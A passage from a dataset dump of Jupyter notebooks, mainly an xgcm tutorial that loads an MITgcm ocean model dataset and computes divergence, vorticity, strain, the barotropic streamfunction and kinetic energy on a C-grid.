"**Note:** These Google colab notebooks timeout if you are idle for more than ~30 minutes which means you'll need to run all your code cells again. ",
"_____no_output_____"
],
[
"# Saving the notebook",
"_____no_output_____"
],
[
"Go to *File* menu and then click on **Save a copy in Drive**. Now you will have your own copy of each notebook in your own Google Drive. If you have a [Github](https://github.com/), you can explore saving it there or even downloading it as a .ipynb or .py file.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e7093fa286f9150453a6fbaf10578e0ce2776af6 | 360,838 | ipynb | Jupyter Notebook | 02_mitgcm.ipynb | daanreijnders/xgcm-examples | 8678ce7dd0453cd0a0ad7cd68224ff676745bab5 | [
"MIT"
] | null | null | null | 02_mitgcm.ipynb | daanreijnders/xgcm-examples | 8678ce7dd0453cd0a0ad7cd68224ff676745bab5 | [
"MIT"
] | null | null | null | 02_mitgcm.ipynb | daanreijnders/xgcm-examples | 8678ce7dd0453cd0a0ad7cd68224ff676745bab5 | [
"MIT"
] | null | null | null | 159.310375 | 36,112 | 0.804095 | [
[
[
"# MITgcm Example \n\nxgcm is developed in close coordination with the [xmitgcm](http://xmitgcm.readthedocs.io/) package.\nThe metadata in datasets constructed by xmitgcm should always be compatible with xgcm's expectations.\nxmitgcm is necessary for reading MITgcm's binary MDS file format.\nHowever, for this example, the MDS files have already been converted and saved as netCDF.\n\nBelow are some example of how to make calculations on mitgcm-style datasets using xgcm.\n\nFirst we import xarray and xgcm:",
"_____no_output_____"
]
],
[
[
"import xarray as xr\nimport numpy as np\nimport xgcm\nfrom matplotlib import pyplot as plt\n%matplotlib inline\nplt.rcParams['figure.figsize'] = (10,6)",
"_____no_output_____"
]
],
[
[
"Now we open the example dataset which is stored in a [zenodo archive](https://zenodo.org/record/4421428#.X_XP7y1h3x9).",
"_____no_output_____"
]
],
[
[
"# download the data\nimport urllib.request\nimport shutil\n\nurl = 'https://zenodo.org/record/4421428/files/'\nfile_name = 'mitgcm_example_dataset_v2.nc'\nwith urllib.request.urlopen(url + file_name) as response, open(file_name, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n \n# open the data\nds = xr.open_dataset(file_name)\nds",
"_____no_output_____"
]
],
[
[
"### Creating the grid object\n\nNext we create a `Grid` object from the dataset.\nWe need to tell xgcm that the `X` and `Y` axes are periodic.\n(The other axes will be assumed to be non-periodic.)",
"_____no_output_____"
]
],
[
[
"grid = xgcm.Grid(ds, periodic=['X', 'Y'])\ngrid",
"_____no_output_____"
]
],
[
[
"We see that xgcm identified five different axes: X (longitude), Y (latitude), Z (depth), T (time), and 1RHO (the axis generated by the output of the LAYERS package).\n\n## Velocity Gradients\n\nThe gradients of the velocity field can be decomposed as divergence, vorticity, and strain. Below we use xgcm to compute the velocity gradients of the horizontal flow.\n\n### Divergence\n\nThe divergence of the horizontal flow is is expressed as\n\n$$ \\frac{\\partial u}{\\partial x} + \\frac{\\partial v}{\\partial y} $$\n\n\nIn discrete form, using [MITgcm notation](https://mitgcm.readthedocs.io/en/latest/algorithm/algorithm.html#horizontal-divergence), the formula for the divergence on C-grid is\n\n$$ \\frac{1}{A_c h_c} ( \\delta_i \\Delta y_g h_w u + \\delta_j \\Delta x_g h_s v ) $$\n\nThe `UVEL`, `dyG` and `hFacW` DataArrays are defined on the U-points, which are on the left points of the X-axis (`XG`), while the `VVEL`, `dxG` and `hFacS` DataArrays are defined on V-points, which are the left point of the Y -axis (`YG`).",
"_____no_output_____"
]
],
[
[
"display(ds.UVEL.dims)\ndisplay(ds.VVEL.dims)",
"_____no_output_____"
],
[
"print(ds.UVEL.dims[2:] == ds.dyG.dims == ds.hFacW.dims[1:])\nprint(ds.VVEL.dims[2:] == ds.dxG.dims == ds.hFacS.dims[1:])",
"True\nTrue\n"
]
],
[
[
"Now comes the xgcm magic: we take the diff along both axes and divide by the cell area element to find the divergence of the horizontal flow. Note how this new variable is at the cell center point.",
"_____no_output_____"
]
],
[
[
"div_uv = (grid.diff(ds.UVEL * ds.dyG * ds.hFacW, 'X') + grid.diff(ds.VVEL * ds.dxG * ds.hFacS, 'Y')) / (ds.rA * ds.hFacC)\ndiv_uv.dims",
"_____no_output_____"
]
],
[
[
"We plot this near the surface and observe the expected patern of divergence at the equator and in the subpolar regions, and convergence in the subtropical gyres.",
"_____no_output_____"
]
],
[
[
"div_uv[0, 0].plot()",
"_____no_output_____"
]
],
[
[
"### Vorticity\n\nThe vertical component of the vorticity is a fundamental quantity of interest in ocean circulation theory. It is defined as\n\n$$ \\zeta = - \\frac{\\partial u}{\\partial y} + \\frac{\\partial v}{\\partial x} \\ . $$\n\nOn the c-grid, a finite-volume representation is given by\n\n$$ \\zeta = (- \\delta_j \\Delta x_c u + \\delta_i \\Delta y_c v ) / A_\\zeta \\ . $$\n\nIn xgcm, we calculate this quantity as",
"_____no_output_____"
]
],
[
[
"zeta = (-grid.diff(ds.UVEL * ds.dxC, 'Y') + grid.diff(ds.VVEL * ds.dyC, 'X'))/ds.rAz\nzeta",
"_____no_output_____"
]
],
[
[
"...which we can see is located at the `YG, XG` horizontal position (also commonly called the vorticity point).\n\nWe plot the vertical integral of this quantity, i.e. the barotropic vorticity:",
"_____no_output_____"
]
],
[
[
"zeta_bt = (zeta * ds.drF).sum(dim='Z')\nzeta_bt.plot(vmax=2e-4)",
"_____no_output_____"
]
],
[
[
"A different way to calculate the barotropic vorticity is to take the curl of the vertically integrated velocity.\nThis formulation also allows us to incorporate the $h$ factors representing partial cell thickness.",
"_____no_output_____"
]
],
[
[
"u_bt = (ds.UVEL * ds.hFacW * ds.drF).sum(dim='Z')\nv_bt = (ds.VVEL * ds.hFacS * ds.drF).sum(dim='Z')\nzeta_bt_alt = (-grid.diff(u_bt * ds.dxC, 'Y') + grid.diff(v_bt * ds.dyC, 'X'))/ds.rAz\nzeta_bt_alt.plot(vmax=2e-4)",
"_____no_output_____"
]
],
[
[
"### Strain\n\nAnother interesting quantity is the horizontal strain, defined as\n\n$$ s = \\frac{\\partial u}{\\partial x} - \\frac{\\partial v}{\\partial y} \\ . $$\n\nOn the c-grid, a finite-volume representation is given by\n\n$$ s = (\\delta_i \\Delta y_g u - \\delta_j \\Delta x_g v ) / A_c \\ . $$",
"_____no_output_____"
]
],
[
[
"strain = (grid.diff(ds.UVEL * ds.dyG, 'X') - grid.diff(ds.VVEL * ds.dxG, 'Y')) / ds.rA\nstrain[0,0].plot()",
"_____no_output_____"
]
],
[
[
"## Barotropic Transport Streamfunction\n\nWe can use the barotropic velocity to calcuate the barotropic transport streamfunction, defined via\n\n$$ u_{bt} = - \\frac{\\partial \\Psi}{\\partial y} \\ , \\ \\ v_{bt} = \\frac{\\partial \\Psi}{\\partial x} \\ .$$\n\nWe calculate this by integrating $u_{bt}$ along the Y axis using the grid object's `cumsum` method:",
"_____no_output_____"
]
],
[
[
"psi = grid.cumsum(-u_bt * ds.dyG, 'Y', boundary='fill')\npsi",
"_____no_output_____"
]
],
[
[
"We see that xgcm automatically shifted the Y-axis position from center (YC) to left (YG) during the cumsum operation.\n\nWe convert to sverdrups and plot with a contour plot.",
"_____no_output_____"
]
],
[
[
"(psi[0] / 1e6).plot.contourf(levels=np.arange(-160, 40, 5))",
"_____no_output_____"
]
],
[
[
"This doesn't look nice because it lacks a suitable land mask. The dataset has no mask provided for the vorticity point. But we can build one with xgcm!",
"_____no_output_____"
]
],
[
[
"maskZ = grid.interp(ds.hFacS, 'X')\n(psi[0] / 1e6).where(maskZ[0]).plot.contourf(levels=np.arange(-160, 40, 5))",
"_____no_output_____"
]
],
[
[
"## Kinetic Energy\n\nFinally, we plot the kinetic energy $1/2 (u^2 + v^2)$ by interpoloting both quantities the cell center point.",
"_____no_output_____"
]
],
[
[
"ke = 0.5*(grid.interp((ds.UVEL*ds.hFacW)**2, 'X') + grid.interp((ds.VVEL*ds.hFacS)**2, 'Y'))\nke[0,0].where(ds.maskC[0]).plot()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.